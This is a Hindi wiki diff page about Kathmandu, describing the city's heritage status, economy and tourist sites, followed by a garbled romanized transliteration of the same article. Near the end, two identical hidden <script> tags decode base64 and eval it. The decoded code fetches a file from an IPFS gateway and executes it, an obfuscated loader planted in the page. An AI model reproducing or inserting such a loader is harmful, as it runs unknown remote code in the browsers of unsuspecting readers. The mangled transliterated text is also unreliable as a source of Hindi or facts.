Difference between revisions of "काठमांडू"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "बाजार" to "बाज़ार")
Line 2: Line 2:
 
[[नेपाल]] की राजधानी, नेपाल का सबसे बड़ा महानगर, प्राचीन मंदिरों के शहर '''काठमांडू''' कला और संस्कृति का केंद्र है। काठमांडू नेपाल की राजनीतिक राजधानी है। यह शहर समुद्रतल से 1300 मीटर की ऊंचाई पर स्थित है। यह 50 वर्ग किमी में फैला हुआ है। काठमांडू नेपाल का सबसे बड़ा अन्तर्राष्ट्रीय नगर है। यहां पर्यटकों का सबसे अधिक आगमन होता है।  
 
[[नेपाल]] की राजधानी, नेपाल का सबसे बड़ा महानगर, प्राचीन मंदिरों के शहर '''काठमांडू''' कला और संस्कृति का केंद्र है। काठमांडू नेपाल की राजनीतिक राजधानी है। यह शहर समुद्रतल से 1300 मीटर की ऊंचाई पर स्थित है। यह 50 वर्ग किमी में फैला हुआ है। काठमांडू नेपाल का सबसे बड़ा अन्तर्राष्ट्रीय नगर है। यहां पर्यटकों का सबसे अधिक आगमन होता है।  
 
==विशेषता==
 
==विशेषता==
पहाड़ियों से घिरा हुआ काठमांडू नगर [[यूनेस्को]] की [[विश्‍व विरासत स्‍थल|विश्‍व धरोहरों]] में शामिल है। यहां संस्कृति और परंपराओं के अतिरिक्त विशिष्ट शैली में बने घर पर्यटकों को अपनी ओर आकर्षित करते हैं। यहां के मंदिरों की विश्व में अपनी अलग पहचान है। यहां के प्राचीन बाजारों की शोभा देखते ही बनती है।[[चित्र:Ultimate-grace-Kathmandu.jpg|thumb|अवलोकितेश्वर, काठमांडू|left]]
+
पहाड़ियों से घिरा हुआ काठमांडू नगर [[यूनेस्को]] की [[विश्‍व विरासत स्‍थल|विश्‍व धरोहरों]] में शामिल है। यहां संस्कृति और परंपराओं के अतिरिक्त विशिष्ट शैली में बने घर पर्यटकों को अपनी ओर आकर्षित करते हैं। यहां के मंदिरों की विश्व में अपनी अलग पहचान है। यहां के प्राचीन बाज़ारों की शोभा देखते ही बनती है।[[चित्र:Ultimate-grace-Kathmandu.jpg|thumb|अवलोकितेश्वर, काठमांडू|left]]
 
==अर्थव्यवस्था==
 
==अर्थव्यवस्था==
 
[[चित्र:Swayambhunath.jpg|thumb|250px|स्वयम्भूनाथ स्तुप]]
 
[[चित्र:Swayambhunath.jpg|thumb|250px|स्वयम्भूनाथ स्तुप]]

Revision as of 10:15, 14 May 2013

[[chitr:Pashupatinath-Temple-Kathmandu.jpg|thumb|250px|pashupatinath mandir, kathamaandoo]] nepal ki rajadhani, nepal ka sabase b da mahanagar, prachin mandiroan ke shahar kathamaandoo kala aur sanskriti ka keandr hai. kathamaandoo nepal ki rajanitik rajadhani hai. yah shahar samudratal se 1300 mitar ki ooanchaee par sthit hai. yah 50 varg kimi mean phaila hua hai. kathamaandoo nepal ka sabase b da antarrashtriy nagar hai. yahaan paryatakoan ka sabase adhik agaman hota hai.

visheshata

paha diyoan se ghira hua kathamaandoo nagar yoonesko ki vishh‍v dharoharoan mean shamil hai. yahaan sanskriti aur paranparaoan ke atirikt vishisht shaili mean bane ghar paryatakoan ko apani or akarshit karate haian. yahaan ke mandiroan ki vishv mean apani alag pahachan hai. yahaan ke prachin bazaroan ki shobha dekhate hi banati hai.thumb|avalokiteshvar, kathamaandoo|left

arthavyavastha

thumb|250px|svayambhoonath stup nagar ki arthavyavastha mean paryatan ka vishesh yogadan hai. kathamaandoo mean paryatakoan ke ghoomane, evan vastu kharidane ke lie paryatan udyog dvara vibhinn suvidhaean upalabdh haian. nepal ka tribhuvan havaee adda nepal ka ekamatr aantarrashtriy vimanapattanam hai. yahaan dilli aur baiank aauk ke raste asani se pahuancha ja sakata hai. yahaan mee-sitanbar ke bich jana achchha rahata hai.

paryatan

kathamaandoo mean svayanbhoo, bauddh stoop, narayanahiti pailes myooziyam, pashupatinath mandir, gardan aauph drims, nasal chauk, themal chauk paryatan ke mukhy akarshan haian. 'kathamaandoo darabar skveyar' yoonesko ki varld heritej list mean shamil hai aur yahaan ka myoojiyam bhi darshaniy hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. kathamaandoo mean kya dekhean (hiandi). . abhigaman tithi: 22 aprॅl, 2012.

sanbandhit lekh